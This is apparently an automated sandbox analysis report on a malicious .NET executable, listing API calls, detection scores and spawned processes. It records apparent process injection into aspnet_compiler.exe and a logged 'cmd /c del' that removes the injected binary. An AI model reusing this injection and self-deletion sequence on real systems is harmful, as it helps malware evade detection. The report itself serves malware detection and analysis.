Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A962A8	0_2_00A962A8
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A91EB0	0_2_00A91EB0
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A96298	0_2_00A96298
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A95EF1	0_2_00A95EF1
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A9BE28	0_2_00A9BE28
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A98A19	0_2_00A98A19
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A93268	0_2_00A93268
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A91271	0_2_00A91271
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A98672	0_2_00A98672
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A997E0	0_2_00A997E0
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A95BF1	0_2_00A95BF1
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A997F0	0_2_00A997F0
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A9C7C0	0_2_00A9C7C0
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A95F00	0_2_00A95F00
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A92300	0_2_00A92300
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A92310	0_2_00A92310
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A98710	0_2_00A98710
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A96760	0_2_00A96760
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A96770	0_2_00A96770
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A91340	0_2_00A91340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010DF900	3_2_010DF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A2D07	3_2_011A2D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D0D20	3_2_010D0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010F4120	3_2_010F4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A1D55	3_2_011A1D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01102581	3_2_01102581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A25DD	3_2_011A25DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010ED5E0	3_2_010ED5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E841F	3_2_010E841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01191002	3_2_01191002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010EB090	3_2_010EB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011020A0	3_2_011020A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A20A8	3_2_011A20A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A2B28	3_2_011A2B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110EBB0	3_2_0110EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0119DBD2	3_2_0119DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A1FF1	3_2_011A1FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010F6E30	3_2_010F6E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A22AE	3_2_011A22AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A2EF7	3_2_011A2EF7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001BD803	14_2_001BD803
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001BE040	14_2_001BE040
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001B9CF0	14_2_001B9CF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001D5CEA	14_2_001D5CEA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001B48E6	14_2_001B48E6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001D3506	14_2_001D3506
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001C6550	14_2_001C6550
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001C1969	14_2_001C1969
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001B7190	14_2_001B7190
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001D31DC	14_2_001D31DC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001BFA30	14_2_001BFA30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001B5226	14_2_001B5226
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001B5E70	14_2_001B5E70
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001B8AD7	14_2_001B8AD7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001BCB48	14_2_001BCB48
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001C5FC8	14_2_001C5FC8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001D6FF0	14_2_001D6FF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D12EF7	14_2_02D12EF7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D122AE	14_2_02D122AE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C66E30	14_2_02C66E30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D0DBD2	14_2_02D0DBD2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D11FF1	14_2_02D11FF1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C7EBB0	14_2_02C7EBB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D12B28	14_2_02D12B28
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D128EC	14_2_02D128EC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C5B090	14_2_02C5B090
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C720A0	14_2_02C720A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D120A8	14_2_02D120A8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D0D466	14_2_02D0D466
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D01002	14_2_02D01002
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C5841F	14_2_02C5841F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02D125DD	14_2_02D125DD

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: String function: 010DB150 appears 35 times

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 14_2_001C374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,

14_2_001C374E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119910 NtAdjustPrivilegesToken,LdrInitializeThunk,	3_2_01119910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119540 NtReadFile,LdrInitializeThunk,	3_2_01119540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011199A0 NtCreateSection,LdrInitializeThunk,	3_2_011199A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011195D0 NtClose,LdrInitializeThunk,	3_2_011195D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119840 NtDelayExecution,LdrInitializeThunk,	3_2_01119840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119860 NtQuerySystemInformation,LdrInitializeThunk,	3_2_01119860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011198F0 NtReadVirtualMemory,LdrInitializeThunk,	3_2_011198F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119710 NtQueryInformationToken,LdrInitializeThunk,	3_2_01119710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119780 NtMapViewOfSection,LdrInitializeThunk,	3_2_01119780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011197A0 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_011197A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119A00 NtProtectVirtualMemory,LdrInitializeThunk,	3_2_01119A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119A20 NtResumeThread,LdrInitializeThunk,	3_2_01119A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119A50 NtCreateFile,LdrInitializeThunk,	3_2_01119A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119660 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_01119660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011196E0 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_011196E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0111AD30 NtSetContextThread,	3_2_0111AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119520 NtWaitForSingleObject,	3_2_01119520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119950 NtQueueApcThread,	3_2_01119950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119560 NtWriteFile,	3_2_01119560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011199D0 NtCreateProcessEx,	3_2_011199D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011195F0 NtQueryInformationFile,	3_2_011195F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119820 NtEnumerateKey,	3_2_01119820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0111B040 NtSuspendThread,	3_2_0111B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011198A0 NtWriteVirtualMemory,	3_2_011198A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0111A710 NtOpenProcessToken,	3_2_0111A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119B00 NtSetValueKey,	3_2_01119B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119730 NtQueryVirtualMemory,	3_2_01119730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119770 NtSetInformationFile,	3_2_01119770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0111A770 NtOpenThread,	3_2_0111A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119760 NtOpenProcess,	3_2_01119760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0111A3B0 NtGetContextThread,	3_2_0111A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119FE0 NtCreateMutant,	3_2_01119FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119610 NtEnumerateValueKey,	3_2_01119610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119A10 NtQuerySection,	3_2_01119A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119650 NtQueryValueKey,	3_2_01119650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119670 NtQueryInformationProcess,	3_2_01119670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01119A80 NtOpenDirectoryObject,	3_2_01119A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011196D0 NtCreateKey,	3_2_011196D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001BB42E NtOpenThreadToken,NtOpenProcessToken,NtClose,	14_2_001BB42E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001B84BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	14_2_001B84BE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001B58A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,	14_2_001B58A4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001BB4C0 NtQueryInformationToken,	14_2_001BB4C0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001BB4F8 NtQueryInformationToken,NtQueryInformationToken,	14_2_001BB4F8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001D6D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	14_2_001D6D90
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001DB5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	14_2_001DB5E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001D9AB4 NtSetInformationFile,	14_2_001D9AB4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001B83F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,	14_2_001B83F2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C896D0 NtCreateKey,LdrInitializeThunk,	14_2_02C896D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C896E0 NtFreeVirtualMemory,LdrInitializeThunk,	14_2_02C896E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C89A50 NtCreateFile,LdrInitializeThunk,	14_2_02C89A50
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C89FE0 NtCreateMutant,LdrInitializeThunk,	14_2_02C89FE0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C89780 NtMapViewOfSection,LdrInitializeThunk,	14_2_02C89780
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C89710 NtQueryInformationToken,LdrInitializeThunk,	14_2_02C89710
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C89840 NtDelayExecution,LdrInitializeThunk,	14_2_02C89840
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C89860 NtQuerySystemInformation,LdrInitializeThunk,	14_2_02C89860
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C895D0 NtClose,LdrInitializeThunk,	14_2_02C895D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C899A0 NtCreateSection,LdrInitializeThunk,	14_2_02C899A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C89540 NtReadFile,LdrInitializeThunk,	14_2_02C89540
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C89910 NtAdjustPrivilegesToken,LdrInitializeThunk,	14_2_02C89910
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C89A80 NtOpenDirectoryObject,	14_2_02C89A80
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C89650 NtQueryValueKey,	14_2_02C89650
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C89660 NtAllocateVirtualMemory,	14_2_02C89660
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C89670 NtQueryInformationProcess,	14_2_02C89670
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C89A00 NtProtectVirtualMemory,	14_2_02C89A00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C89610 NtEnumerateValueKey,	14_2_02C89610
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C89A10 NtQuerySection,	14_2_02C89A10
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C89A20 NtResumeThread,	14_2_02C89A20
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C897A0 NtUnmapViewOfSection,	14_2_02C897A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C8A3B0 NtGetContextThread,	14_2_02C8A3B0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C89760 NtOpenProcess,	14_2_02C89760
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C89770 NtSetInformationFile,	14_2_02C89770
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C8A770 NtOpenThread,	14_2_02C8A770
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C89B00 NtSetValueKey,	14_2_02C89B00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C8A710 NtOpenProcessToken,	14_2_02C8A710
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C89730 NtQueryVirtualMemory,	14_2_02C89730
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C898F0 NtReadVirtualMemory,	14_2_02C898F0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C898A0 NtWriteVirtualMemory,	14_2_02C898A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C8B040 NtSuspendThread,	14_2_02C8B040
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C89820 NtEnumerateKey,	14_2_02C89820
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C899D0 NtCreateProcessEx,	14_2_02C899D0

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 14_2_001C6550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,

14_2_001C6550

Source: U8RYIwIvfK.exe, 00000000.00000002.268661808.00000000027CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs U8RYIwIvfK.exe
Source: U8RYIwIvfK.exe, 00000000.00000002.268596794.00000000027AC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBLACKDEVIL.dll6 vs U8RYIwIvfK.exe
Source: U8RYIwIvfK.exe, 00000000.00000002.268596794.00000000027AC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs U8RYIwIvfK.exe
Source: U8RYIwIvfK.exe, 00000000.00000002.270167815.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs U8RYIwIvfK.exe
Source: U8RYIwIvfK.exe, 00000000.00000000.252749623.0000000000254000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameBFXBNFDHDJNG.exe: vs U8RYIwIvfK.exe
Source: U8RYIwIvfK.exe, 00000000.00000002.268746824.00000000027DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs U8RYIwIvfK.exe
Source: U8RYIwIvfK.exe, 00000000.00000002.267385039.0000000002640000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameBLACKDEVIL.dll6 vs U8RYIwIvfK.exe
Source: U8RYIwIvfK.exe, 00000000.00000002.268762286.00000000027E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs U8RYIwIvfK.exe
Source: U8RYIwIvfK.exe	Binary or memory string: OriginalFilenameBFXBNFDHDJNG.exe: vs U8RYIwIvfK.exe

Source: U8RYIwIvfK.exe	ReversingLabs: Detection: 43%
Source: U8RYIwIvfK.exe	Virustotal: Detection: 38%

Source: U8RYIwIvfK.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\U8RYIwIvfK.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\U8RYIwIvfK.exe C:\Users\user\Desktop\U8RYIwIvfK.exe
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Users\user\Desktop\U8RYIwIvfK.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\U8RYIwIvfK.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@11/1@2/2

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 14_2_001DA0D2 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,

14_2_001DA0D2

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 14_2_001BC5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,

14_2_001BC5CA

Source: U8RYIwIvfK.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:120:WilError_01

Source: U8RYIwIvfK.exe, u206f????????????????????????????????????????.cs	Cryptographic APIs: 'CreateDecryptor'
Source: U8RYIwIvfK.exe, u206f????????????????????????????????????????.cs	Cryptographic APIs: 'TransformBlock'
Source: U8RYIwIvfK.exe, u206f????????????????????????????????????????.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.0.U8RYIwIvfK.exe.240000.0.unpack, u206f????????????????????????????????????????.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.U8RYIwIvfK.exe.240000.0.unpack, u206f????????????????????????????????????????.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.0.U8RYIwIvfK.exe.240000.0.unpack, u206f????????????????????????????????????????.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\U8RYIwIvfK.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: U8RYIwIvfK.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: U8RYIwIvfK.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: U8RYIwIvfK.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BLACKDEVIL.pdbBSJB source: U8RYIwIvfK.exe, 00000000.00000002.268596794.00000000027AC000.00000004.00000800.00020000.00000000.sdmp, U8RYIwIvfK.exe, 00000000.00000002.267385039.0000000002640000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000003.00000003.268178554.0000000000F19000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.369800371.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.367713798.00000000028E9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: aspnet_compiler.exe, 00000003.00000003.366743571.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, cmd.exe, 0000000E.00000000.367246738.00000000001B0000.00000040.80000000.00040000.00000000.sdmp
